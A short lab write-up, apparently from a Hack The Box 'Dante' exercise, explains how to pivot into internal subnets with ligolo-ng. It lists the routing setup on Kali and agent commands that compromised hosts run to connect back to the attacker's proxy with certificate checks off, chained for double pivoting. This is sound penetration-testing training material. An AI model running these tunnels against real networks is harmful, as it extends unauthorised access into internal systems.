I did this in HTB Dante. Will write this post as generic as possible.
Assume you already have access to a machine, e.g. 10.10.110.X. You noticed that it has access to 172.16.1.0/24 network.
You want to access 172.16.1.0/24 from your local Kali 10.10.14.2
End result should look something like this:
Download the agent and proxy files from ligolo-ng Github
Transfer the agent file to the target machine, 10.10.110.X
Set up the interface and route in Kali by running these commands
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo
Now, time to establish the connection
Kali:
sudo ./proxy -selfcert
Target:
chmod +x agent
./agent -connect 10.10.14.2:11601 -ignore-cert
Can see that agent has joined. So we gonna start the session in Kali
session
1
start
On a new terminal window, you should be able to ping machines that are in 172.16.1.0/24.
Double Pivoting
Assumptions: Your Kali is able to reach 172.16.1.0/24 network using ligolo-ng from the previous step. Now, you want it to reach 172.16.2.0/24 as well. The machine that has connectivity to 172.16.2.0/24 is 172.16.1.A
End result should look like this image:
On Kali, add another route
sudo ip route add 172.16.2.0/24 dev ligolo
On 172.16.1.A, transfer agent file to it. It will be agent.exe if it is a Windows machine.
Run the same command as what you did before
agent.exe -connect 10.10.14.2:11601 -ignore-cert
On your original ligolo-ng proxy screen, you can see new agent joined. You can switch to this new agent
session
2
start
Yes
Now, try ping should be able to work for IPs in either subnets.
However, you will only be able to reach one machine e.g. 172.16.2.B because you are pivoting from 172.16.1.A. If you want to reach other machines in 172.16.2.0/24, you got to pivot from 172.16.2.B
On 172.16.2.B which you currently have access to, transfer agent file to it. Run the same command again.
./agent.exe -connect 10.10.14.2:11601 -ignore-cert
On the proxy window, switch session by running the same commands
session
3
start
Yes
Now, you are able to access machines in both subnets.
Cheers!
Leave a comment